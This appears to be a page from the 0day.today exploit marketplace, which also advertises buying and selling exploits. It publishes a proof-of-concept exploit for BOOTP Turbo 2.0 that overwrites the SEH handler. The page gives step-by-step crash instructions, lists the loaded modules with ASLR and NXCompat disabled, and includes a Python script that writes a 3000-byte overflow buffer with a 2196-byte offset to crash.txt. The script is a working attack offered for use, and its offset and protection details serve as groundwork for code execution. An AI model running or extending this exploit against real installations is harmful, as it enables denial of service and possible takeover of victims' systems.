0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
BOOTP Turbo 2.0 - Denial of Service (SEH) Exploit
# Exploit Title: BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC) # Exploit Author: boku # Software Vendor: Wierd Solutions # Vendor Homepage: https://www.weird-solutions.com # Software Link: https://www.weird-solutions.com/download/products/bootpt_demo_IA32.exe # Version: BOOTP Turbo (x86) Version 2.0 # Tested On: Windows 10 Pro -- 10.0.18363 Build 18363 x86-based PC # Tested On: Windows 7 Enterprise SP1 -- build 7601 64-bit # Replicate Crash: # 1) Download, Install, and Open BootP Turbo v2.0 for windows x86 # 2) Go to Edit > Settings > Click the Detailed Logging Box # 3) Run python script, open created file 'crash.txt' # 4) Select-All > Copy All, from file # 5) Paste buffer in the 'Log File' text-box, Click 'OK' # 6) Close the 'Control Service' Pop-Up Window # 7) Crash with SEH Overwrite # SEH chain of main thread # Address SE handler # 019CD254 43434343 # 42424242 *** CORRUPT ENTRY *** # Loaded Application Modules # Rebase | SafeSEH | ASLR | NXCompat | Version, Modulename & Path # True | True | False | False | 4.7.3.0 [QtGui4.dll] (C:\Program Files\BOOTP Turbo\QtGui4.dll) # True | True | False | False | 4.7.3.0 [QtCore4.dll] (C:\Program Files\BOOTP Turbo\QtCore4.dll) # True | True | False | False | 10.00.30319.1 [MSVCP100.dll] (C:\Program Files\BOOTP Turbo\MSVCP100.dll) # True | True | False | False | 2.0 [bootptui.exe] (C:\Program Files\BOOTP Turbo\bootptui.exe) # True | True | False | False | 10.00.30319.1 [MSVCR100.dll] (C:\Program Files\BOOTP Turbo\MSVCR100.dll) #!/usr/bin/python offset = '\x41'*2196 nSEH = '\x42\x42\x42\x42' SEH = '\x43\x43\x43\x43' filler = '\x44'*(3000-len(offset+nSEH+SEH)) payload = offset+nSEH+SEH+filler try: f=open("crash.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.") # 0day.today [2024-07-07] #